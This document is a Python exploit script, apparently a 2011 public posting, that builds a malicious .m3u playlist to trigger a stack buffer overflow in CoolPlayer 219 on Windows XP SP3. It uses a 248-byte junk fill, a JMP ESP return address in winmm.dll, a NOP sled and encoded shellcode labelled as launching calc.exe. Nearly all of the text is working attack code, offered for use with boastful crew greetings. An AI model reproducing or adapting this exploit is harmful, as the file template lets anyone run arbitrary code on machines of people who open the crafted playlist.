# ######################################################################### #~ Title : CoolPlayer 219 Buffer Overflow Exploit #~ Software : http://coolplayer.en.softonic.com/ #~ Tested on : Windows XP SP3 English #~ Date : 04/07/2011 #~ Author : X-h4ck #~ Site : http://www.pirate.al/ #PirateAL Crew , http://theflashcrew.blogspot.com/ #~ Email : mem001@live.com #~ Greetz : Wulns~ - IllyrianWarrior - Danzel - Ace - M4yh3m - Saldeath - bi0 - Slimshaddy - d3trimentaL - Lekosta - Pretorian - CroSs(r00tworm) - Rigon # ######################################################################### #!/usr/bin/python print " CoolPlayer 219 Buffer Overflow Exploit" print " Author : X-h4ck" print " www.pirate.al, http://theflashcrew.blogspot.com" print " Wulns~ - IllyrianWarrior - Danzel - Ace - M4yh3m - Saldeath - bi0 - Slimshaddy - d3trimentaL - Lekosta - Pretorian - CroSs - Rigon" print " // Aint no pussy made where we came from \\\ @PirateAL Crew" print " " print " " filename = "PirateAL.m3u" junk = "\x41" * 248 EIP = "\xDC\x3A\xB4\x76" # JMP ESP 0x76B43ADC winmm.dll nopsled = "\x90" * 20 #calc.exe shellcode = ("\x33\xc9\xb8\xa2\xe0\xe4\x44\xb1\x33\xda\xdf\xd9\x74\x24" "\xf4\x5b\x31\x43\x0e\x03\x43\x0e\x83\x49\x1c\x06\xb1\x71" "\x35\x4e\x3a\x89\xc6\x31\xb2\x6c\xf7\x63\xa0\xe5\xaa\xb3" "\xa2\xab\x46\x3f\xe6\x5f\xdc\x4d\x2f\x50\x55\xfb\x09\x5f" "\x66\xcd\x95\x33\xa4\x4f\x6a\x49\xf9\xaf\x53\x82\x0c\xb1" "\x94\xfe\xff\xe3\x4d\x75\xad\x13\xf9\xcb\x6e\x15\x2d\x40" "\xce\x6d\x48\x96\xbb\xc7\x53\xc6\x14\x53\x1b\xfe\x1f\x3b" "\xbc\xff\xcc\x5f\x80\xb6\x79\xab\x72\x49\xa8\xe5\x7b\x78" "\x94\xaa\x45\xb5\x19\xb2\x82\x71\xc2\xc1\xf8\x82\x7f\xd2" "\x3a\xf9\x5b\x57\xdf\x59\x2f\xcf\x3b\x58\xfc\x96\xc8\x56" "\x49\xdc\x97\x7a\x4c\x31\xac\x86\xc5\xb4\x63\x0f\x9d\x92" "\xa7\x54\x45\xba\xfe\x30\x28\xc3\xe1\x9c\x95\x61\x69\x0e" "\xc1\x10\x30\x44\x14\x90\x4e\x21\x16\xaa\x50\x01\x7f\x9b" "\xdb\xce\xf8\x24\x0e\xab\xe7\xc6\x9b\xc1\x8f\x5e\x4e\x68" "\xd2\x60\xa4\xae\xeb\xe2\x4d\x4e\x08\xfa\x27\x4b\x54\xbc" "\xd4\x21\xc5\x29\xdb\x96\xe6\x7b\xb8\x79\x75\xe7\x11\x1c" "\xfd\x82\x6d") pwn = junk+EIP+nopsled+shellcode FILE = open(filename, "w") FILE.write(pwn) FILE.close() print " Evil File created succesully, time for pwnage"